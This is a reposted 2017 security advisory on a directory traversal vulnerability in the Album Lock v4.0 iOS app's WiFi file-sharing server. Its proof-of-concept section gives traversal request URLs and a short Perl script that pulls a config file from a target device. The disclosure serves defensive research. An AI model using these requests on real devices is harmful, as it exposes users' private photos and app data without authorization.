Document Title: =============== Album Lock v4.0 iOS - Directory Traversal Vulnerability References (Source): ==================== http://ift.tt/2lyrGOY Release Date: ============= 2017-02-20 Vulnerability Laboratory ID (VL-ID): ==================================== 2033 Common Vulnerability Scoring System: ==================================== 7.2 Product & Service Introduction: =============================== Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most convenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways. From Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera. (Copy of the Homepage: http://ift.tt/2mdZ2j1 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 ios mobile application. Vulnerability Disclosure Timeline: ================================== 2017-02-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A directory traversal web vulnerability has been dsicovered in the official Album Lock v4.0 iOS mobile web-application. The issue allows an attackers to unauthorized request and download local application files by manipulation of path parameters. The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers are able to request the local web-server during the sharing process to access unauthenticated application files. Attackers are able to request via `getObject` image path variables to access or download files. Remote attackers are able to access the root `document` path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server web-application. Finally an attacker is able to access with the credentials the service by using a client via http protocol. The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2. Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access. Request Method(s): [+] GET Vulnerable Module(s): [+] getObject Vulnerable Parameter(s): [+] filePaht Affected Module(s): [+] Web-Server File System Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Standard Request: http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png PoC: Payload /var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application Malicious Request: Exploitation http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/ http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/ http://localhost:8880/getImage?filePaht=/var/mobile/ PoC: Exploit use strict; use LWP::UserAgent; my $b = LWP::UserAgent->new(); my $host = "1.1.1.1:5555"; print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment